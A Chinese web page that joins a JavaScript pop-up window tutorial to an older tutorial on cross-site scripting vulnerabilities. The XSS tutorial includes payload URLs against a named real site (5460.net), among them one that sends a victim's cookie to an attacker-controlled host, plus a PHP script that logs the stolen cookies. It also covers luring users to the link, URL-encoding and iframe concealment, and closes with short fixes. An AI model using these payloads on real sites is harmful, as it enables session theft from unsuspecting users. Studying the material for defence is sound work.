【1、最基本的彈出窗口代碼】
其實代碼非常簡單:
<SCRIPT LANGUAGE="javascript">
<!--
window.open ('page.html')
-->
</SCRIPT>
因爲是一段javascripts代碼,所以它們應該放在<SCRIPT LANGUAGE="javascript">標籤和</script>之間。<!-- 和 -->是對一些版本低的瀏覽器起作用,在這些老瀏覽器中不會將標籤中的代碼作爲文本顯示出來。要養成這個好習慣啊。
window.open ('page.html') 用於控制彈出新的窗口page.html,如果page.html不與主窗口在同一路徑下,前面應寫明路徑,絕對路徑(http://)和相對路徑(../)均可。用單引號和雙引號都可以,只是不要混用。
這一段代碼可以加入HTML的任意位置,<head>和</head>之間可以,<body>間</body>也可以,越前越早執行,尤其是頁面代碼長,又想使頁面早點彈出就儘量往前放。
【2、經過設置後的彈出窗口】
下面再說一說彈出窗口的設置。只要再往上面的代碼中加一點東西就可以了。我們來定製這個彈出的窗口的外觀,尺寸大小,彈出的位置以適應該頁面的具體情況。
<SCRIPT LANGUAGE="javascript">
<!--
window.open ('page.html', 'newwindow', 'height=100, width=400, top=0,
left=0, toolbar=no, menubar=no, scrollbars=no, resizable=no,location=n
o, status=no')
//寫成一行
-->
</SCRIPT>
參數解釋:
<SCRIPT LANGUAGE="javascript"> js腳本開始;
window.open 彈出新窗口的命令;
'page.html' 彈出窗口的文件名;
'newwindow' 彈出窗口的名字(不是文件名),非必須,可用空''代替;
height=100 窗口高度;
width=400 窗口寬度;
top=0 窗口距離屏幕上方的象素值;
left=0 窗口距離屏幕左側的象素值;
toolbar=no 是否顯示工具欄,yes爲顯示;
menubar,scrollbars 表示菜單欄和滾動欄。
resizable=no 是否允許改變窗口大小,yes爲允許;
location=no 是否顯示地址欄,yes爲允許;
status=no 是否顯示狀態欄內的信息(通常是文件已經打開),yes爲允許;
</SCRIPT> js腳本結束
【3、用函數控制彈出窗口】
下面是一個完整的代碼。
<html>
<head>
<script LANGUAGE="javascript">
<!--
function openwin() {
window.open ("page.html", "newwindow", "height=100, width=400, toolbar
=no, menubar=no, scrollbars=no, resizable=no, location=no, status=no")
//寫成一行
}
//-->
</script>
</head>
<body οnlοad="openwin()">
...任意的頁面內容...
</body>
</html>
這裏定義了一個函數openwin(),函數內容就是打開一個窗口。在調用它之前沒有任何用途。怎麼調用呢?
方法一:<body οnlοad="openwin()"> 瀏覽器讀頁面時彈出窗口;
方法二:<body οnunlοad="openwin()"> 瀏覽器離開頁面時彈出窗口;
方法三:用一個連接調用:
<a href="#" οnclick="openwin()">打開一個窗口
注意:使用的“#”是虛連接。
方法四:用一個按鈕調用:
<input type="button" οnclick="openwin()" value="打開窗口">
【4、同時彈出2個窗口】
對源代碼稍微改動一下:
<script LANGUAGE="javascript">
<!--
function openwin() {
window.open ("page.html", "newwindow", "height=100, width=100, top=0,
left=0,toolbar=no, menubar=no, scrollbars=no, resizable=no, location=n
o, status=no")
//寫成一行
window.open ("page2.html", "newwindow2", "height=100, width=100, top=1
00, left=100,toolbar=no, menubar=no, scrollbars=no, resizable=no, loca
tion=no, status=no")
//寫成一行
}
//-->
</script>
爲避免彈出的2個窗口覆蓋,用top和left控制一下彈出的位置不要相互覆蓋即可。最後用上面說過的四種方法調用即可。
注意:2個窗口的name(newwindows和newwindow2)不要相同,或者乾脆全部爲空。
【5、主窗口打開文件1.htm,同時彈出小窗口page.html】
如下代碼加入主窗口<head>區:
<script language="javascript">
<!--
function openwin() {
window.open("page.html","","width=200,height=200")
}
//-->
</script>
加入<body>區:
<a href="1.htm" οnclick="openwin()">open即可。
【6、彈出的窗口之定時關閉控制】
下面我們再對彈出的窗口進行一些控制,效果就更好了。如果我們再將一小段代碼加入彈出的頁面(注意是加入到page.html的HTML中,可不是主頁面中,否則...),讓它10秒後自動關閉是不是更酷了?
首先,將如下代碼加入page.html文件的<head>區:
<script language="javascript">
function closeit() {
setTimeout("self.close()",10000) //毫秒
}
</script>
然後,再用<body οnlοad="closeit()"> 這一句話代替page.html中原有的<BODY>這一句就可以了。(這一句話千萬不要忘記寫啊!這一句的作用是調用關閉窗口的代碼,10秒鐘後就自行關閉該窗口。)
【7、在彈出窗口中加上一個關閉按鈕】
<FORM>
<INPUT TYPE='BUTTON' value='關閉' onClick='window.close()'>
</FORM>
呵呵,現在更加完美了!
【8、內包含的彈出窗口-一個頁面兩個窗口】
上面的例子都包含兩個窗口,一個是主窗口,另一個是彈出的小窗口。通過下面的例子,你可以在一個頁面內完成上面的效果。
<html>
<head>
<SCRIPT LANGUAGE="javascript">
function openwin()
{
OpenWindow=window.open("", "newwin", "height=250, width=250,toolbar=no
,scrollbars="+scroll+",menubar=no");
//寫成一行
OpenWindow.document.write("<TITLE>例子</TITLE>")
OpenWindow.document.write("<BODY BGCOLOR=#ffffff>")
OpenWindow.document.write("<h1>Hello!</h1>")
OpenWindow.document.write("New window opened!")
OpenWindow.document.write("</BODY>")
OpenWindow.document.write("</HTML>")
OpenWindow.document.close()
}
</SCRIPT>
</head>
<body>
<a href="#" οnclick="openwin()">打開一個窗口
<input type="button" οnclick="openwin()" value="打開窗口">
</body>
</html>
看看 OpenWindow.document.write()裏面的代碼不就是標準的HTML嗎?只要按照格式寫更多的行即可。千萬注意多一個標籤或少一個標籤就會出現錯誤。記得用OpenWindow.document.close()結束啊。
【9、終極應用--彈出的窗口之Cookie控制】
回想一下,上面的彈出窗口雖然酷,但是有一點小毛病(沉浸在喜悅之中,一定沒有發現吧?)比如你將上面的腳本放在一個需要頻繁經過的頁面裏(例如首頁),那麼每次刷新這個頁面,窗口都會彈出一次,是不是非常煩人?:-(有解決的辦法嗎?Yes! ;-) Follow me.
我們使用cookie來控制一下就可以了。
首先,將如下代碼加入主頁面HTML的<HEAD>區:
<script>
function openwin(){
window.open("page.html","","width=200,height=200")
}
function get_cookie(Name) {
var search = Name + "="
var returnvalue = "";
if (documents.cookie.length > 0) {
offset = documents.cookie.indexOf(search)
if (offset != -1) {
offset += search.length
end = documents.cookie.indexOf(";", offset);
if (end == -1)
end = documents.cookie.length;
returnvalue=unescape(documents.cookie.substring(offset, end))
}
}
return returnvalue;
}
function loadpopup(){
if (get_cookie('popped')==''){
openwin()
documents.cookie="popped=yes"
}
}
</script>
然後,用<body οnlοad="loadpopup()">(注意不是openwin而是loadpop啊!)替換主頁面中原有的<BODY>這一句即可。你可以試着刷新一下這個頁面或重新進入該頁面,窗口再也不會彈出了。真正的Pop-Only-Once!寫到這裏彈出窗口的製作和應用技巧基本上算是完成了
','''╭⌒╮⌒╮.',''',,',.'',,','',.
╱◥██◣''o┈天空在下雨┄o.'',,',.
︱田︱田田| '',,',.o┈是天在讓我哭泣┄o
╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬
-=-=-=-=-=>
跨站腳本執行漏洞詳解
【前言】
本文主要介紹跨站腳本執行漏洞的成因,形式,危害,利用方式,隱藏技巧,解決方法和常見問題 (FAQ),由於目前介紹跨站腳本執行漏洞的資料還不是很多,而且一般也不是很詳細,所以希望本文能夠 比較詳細的介紹該漏洞。由於時間倉促,水平有限,本文可能有不少錯誤,希望大家不吝賜教。
聲明,請不要利用本文介紹的任何內容,代碼或方法進行破壞,否則一切後果自負!
【漏洞成因】
原因很簡單,就是因爲CGI程序沒有對用戶提交的變量中的HTML代碼進行過濾或轉換。
【漏洞形式】
這裏所說的形式,實際上是指CGI輸入的形式,主要分爲兩種:
1.顯示輸入
2.隱式輸入
其中顯示輸入明確要求用戶輸入數據,而隱式輸入則本來並不要求用戶輸入數據,但是用戶卻可以通 過輸入數據來進行干涉。
顯示輸入又可以分爲兩種:
1. 輸入完成立刻輸出結果
2. 輸入完成先存儲在文本文件或數據庫中,然後再輸出結果
注意:後者可能會讓你的網站面目全非!:(
而隱式輸入除了一些正常的情況外,還可以利用服務器或CGI程序處理錯誤信息的方式來實施。
【漏洞危害】
大家最關心的大概就要算這個問題了,下面列舉的可能並不全面,也不繫統,但是我想應該是比較典 型的吧。
1. 獲取其他用戶Cookie中的敏感數據
2. 屏蔽頁面特定信息
3. 僞造頁面信息
4. 拒絕服務攻擊
5. 突破外網內網不同安全設置
6. 與其它漏洞結合,修改系統設置,查看系統文件,執行系統命令等
7. 其它
一般來說,上面的危害還經常伴隨着頁面變形的情況。而所謂跨站腳本執行漏洞,也就是通過別人的 網站達到攻擊的效果,也就是說,這種攻擊能在一定程度上隱藏身份。
【利用方式】
下面我們將通過具體例子來演示上面的各種危害,這樣應該更能說明問題,而且更易於理解。爲了條 理更清晰一些,我們將針對每種危害做一個實驗。
爲了做好這些實驗,我們需要一個抓包軟件,我使用的是Iris,當然你可以選擇其它的軟件,比如 NetXray什麼的。至於具體的使用方法,請參考相關幫助或手冊。
另外,需要明白的一點就是:只要服務器返回用戶提交的信息,就可能存在跨站腳本執行漏洞。
好的,一切就緒,我們開始做實驗!:)
實驗一:獲取其他用戶Cookie中的敏感信息
我們以國內著名的同學錄站點5460.net爲例來說明一下,請按照下面的步驟進行:
1. 進入首頁http://www.5460.net/
2. 輸入用戶名“<h1>”,提交,發現服務器返回信息中包含了用戶提交的“<h1>”。
3. 分析抓包數據,得到實際請求:
http://www.5460.net/txl/login/login.pl?username=<h1>&passwd=&ok.x=28&ok.y=6
4. 構造一個提交,目標是能夠顯示用戶Cookie信息:
http://www.5460.net/txl/login/login.pl?username=<script>alert(documents.cookie)</ script>&passwd=&ok.x=28&ok.y=6
5. 如果上面的請求獲得預期的效果,那麼我們就可以嘗試下面的請求:
http://www.5460.net/txl/login/login.pl?username=<script>window.open("http://www.notfound.org/ info.php?"%2Bdocuments.cookie)</script>&passwd=&ok.x=28&ok.y=6
其中http://www.notfound.org/info.php是你能夠控制的某臺主機上的一個腳本,功能是獲取查詢字符串的信 息,內容如下:
<?php
$info = getenv("QUERY_STRING");
if ($info) {
$fp = fopen("info.txt","a");
fwrite($fp,$info."/n");
fclose($fp);
}
header("Location: http://www.5460.net");
注:“%2B”爲“+”的URL編碼,並且這裏只能用“%2B”,因爲“+”將被作爲空格處理。後面的header語 句則純粹是爲了增加隱蔽性。
6. 如果上面的URL能夠正確運行的話,下一步就是誘使登陸5460.net的用戶訪問該URL,而我們就可以 獲取該用戶Cookie中的敏感信息。
7. 後面要做什麼就由你決定吧!
實驗二:屏蔽頁面特定信息
我們仍然以5460.net作爲例子,下面是一個有問題的CGI程序:
http://www.5460.net/txl/liuyan/liuyanSql.pl
該CGI程序接受用戶提供的三個變量,即nId,csId和cName,但是沒有對用戶提交的cName變量進行任何檢 查,而且該CGI程序把cName的值作爲輸出頁面的一部分,5460.net的用戶應該都比較清楚留言右下角有你 的名字,對吧?
既然有了上面的種種條件,我們可以不妨作出下面的結論:
某個用戶可以“屏蔽”其兩次留言之間的所有留言!
當然,我們說的“屏蔽”不是“刪除”,用戶的留言還是存在的,只不過由於HTML的特性,我們無法從 頁面看到,當然如果你喜歡查看源代碼的話就沒有什麼用處了,但是出了我們這些研究CGI安全的人來 說,有多少人有事沒事都看HTML源代碼?
由於種種原因,我在這裏就不公佈具體的細節了,大家知道原理就好了。
注:仔細想想,我們不僅能屏蔽留言,還能匿名留言,Right?
實驗三:僞造頁面信息
如果你理解了上面那個實驗,這個實驗就沒有必要做了,基本原理相同,只是實現起來稍微麻煩一點而 已。
實驗四:拒絕服務攻擊
現在應該知道,我們在某種程度上可以控制存在跨站腳本執行漏洞的服務器的行爲,既然這樣,我們 就可以控制服務器進行某種消耗資源的動作。比如說運行包含死循環或打開無窮多個窗口的javascript腳本 等等。這樣訪問該URL的用戶系統就可能因此速度變慢甚至崩潰。同樣,我們也可能在其中嵌入一些腳 本,讓該服務器請求其它服務器上的資源,如果訪問的資源比較消耗資源,並且訪問人數比較多的話,那 麼被訪問的服務器也可能被拒絕服務,而它則認爲該拒絕服務攻擊是由訪問它的服務器發起的,這樣就可 以隱藏身份。
實驗五:突破外網內網不同安全設置
這個應該很好理解吧,一般來說我們的瀏覽器對不同的區域設置了不同的安全級別。舉例來說,對於 Internet區域,可能你不允許javascript執行,而在Intranet區域,你就允許javascript執行。一般來說,前者的 安全級別都要高於後者。這樣,一般情況下別人無法通過執行惡意javascript腳本對你進行攻擊,但是如果 與你處於相同內網的服務器存在跨站腳本執行漏洞,那麼攻擊者就有機可乘了,因爲該服務器位於Intranet 區域。
實驗六:與其它漏洞結合,修改系統設置,查看系統文件,執行系統命令等
由於與瀏覽器相關的漏洞太多了,所以可與跨站腳本執行漏洞一起結合的漏洞也就顯得不少。我想這 些問題大家都應該很清楚吧,前些時間的修改IE標題漏洞,錯誤MIME類型執行命令漏洞,還有多種多樣 的蠕蟲,都是很好的例子。
更多的例子請參考下列鏈接:
Internet Explorer Pop-Up OBJECT Tag Bug
http://archives.neohapsis.com/archives/bugtraq/2002-01/0167.html
Internet Explorer javascript Modeless Popup Local Denial of Service Vulnerability
http://archives.neohapsis.com/archives/bugtraq/2002-01/0058.html
MSIE6 can read local files
http://www.xs4all.nl/~jkuperus/bug.htm
MSIE may download and run progams automatically
http://archives.neohapsis.com/archives/bugtraq/2001-12/0143.html
File extensions spoofable in MSIE download dialog
http://archives.neohapsis.com/archives/bugtraq/2001-11/0203.html
the other IE cookie stealing bug (MS01-055)
http://archives.neohapsis.com/archives/bugtraq/2001-11/0106.html
Microsoft Security Bulletin MS01-055
http://archives.neohapsis.com/archives/bugtraq/2001-11/0048.html
Serious security Flaw in Microsoft Internet Explorer - Zone Spoofing
http://archives.neohapsis.com/archives/bugtraq/2001-10/0075.html
Incorrect MIME Header Can Cause IE to Execute E-mail Attachment
http://www.kriptopolis.com/cua/eml.html
跨站腳本執行漏洞在這裏的角色就是隱藏真正攻擊者的身份。
實驗七:其它
其實這類問題和跨站腳本執行漏洞沒有多大關係,但是在這裏提一下還是很有必要的。問題的實質還 是CGI程序沒有過濾用戶提交的數據,然後進行了輸出處理。舉個例子來說,支持SSI的服務器上的CGI程 序輸出了用戶提交的數據,無論該數據是採取何種方式輸入,都可能導致SSI指令的執行。當然,這是在服 務端,而不是客戶端執行。其實像ASP,PHP和Perl等CGI語言都可能導致這種問題。
【隱藏技巧】
出於時間的考慮,我在這裏將主要講一下理論了,相信不是很難懂,如果實在有問題,那麼去找本書 看吧。
1. URL編碼
比較一下:
http://www.5460.net/txl/login/login.pl?username=<h1>&passwd=&ok.x=28&ok.y=6
http://www.5460.net/txl/login/login.pl?username=%3C%68%31%3E&passwd=&ok.x=28&ok.y=6
你覺得哪個更有隱蔽性?!
2. 隱藏在其它對象之下
與直接給別人一個鏈接相比,你是否決定把該鏈接隱藏在按鈕以下更好些呢?
3. 嵌入頁面中
讓別人訪問一個地址(注意這裏的地址不同於上面提到的URL),是不是又要比讓別人按一個按鈕容易得 多,藉助於Iframe,你可以把這種攻擊變得更隱蔽。
4. 合理利用事件
合理使用事件,在某些情況上可以繞過CGI程序對輸入的限制,比如說前些日子的SecurityFocus的跨站腳本 執行漏洞。
【注意事項】
一般情況下直接進行類似<script>alert(documents.cookie)</script>之類的攻擊沒有什麼問題,但是有時 CGI程序對用戶的輸入進行了一些處理,比如說包含在’’或””之內,這時我們就需要使用一些小技巧 來繞過這些限制。
如果你對HTML語言比較熟悉的話,繞過這些限制應該不成問題。
【解決方法】
要避免受到跨站腳本執行漏洞的攻擊,需要程序員和用戶兩方面共同努力:
程序員:
1. 過濾或轉換用戶提交數據中的HTML代碼
2. 限制用戶提交數據的長度
用戶:
1. 不要輕易訪問別人給你的鏈接
2. 禁止瀏覽器運行javascript和ActiveX代碼
附:常見瀏覽器修改設置的位置爲:
Internet Explorer:
工具->Internet選項->安全->Internet->自定義級別
工具->Internet選項->安全->Intranet->自定義級別
Opera:
文件->快速參數->允許使用Java
文件->快速參數->允許使用插件
文件->快速參數->允許使用javascript
【常見問題】
Q:跨站腳本執行漏洞在哪裏存在?
A:只要是CGI程序,只要允許用戶輸入,就可能存在跨站腳本執行漏洞。
Q:跨站腳本執行漏洞是不是隻能偷別人的Cookie?
A:當然不是!HTML代碼能做的,跨站腳本執行漏洞基本都能做。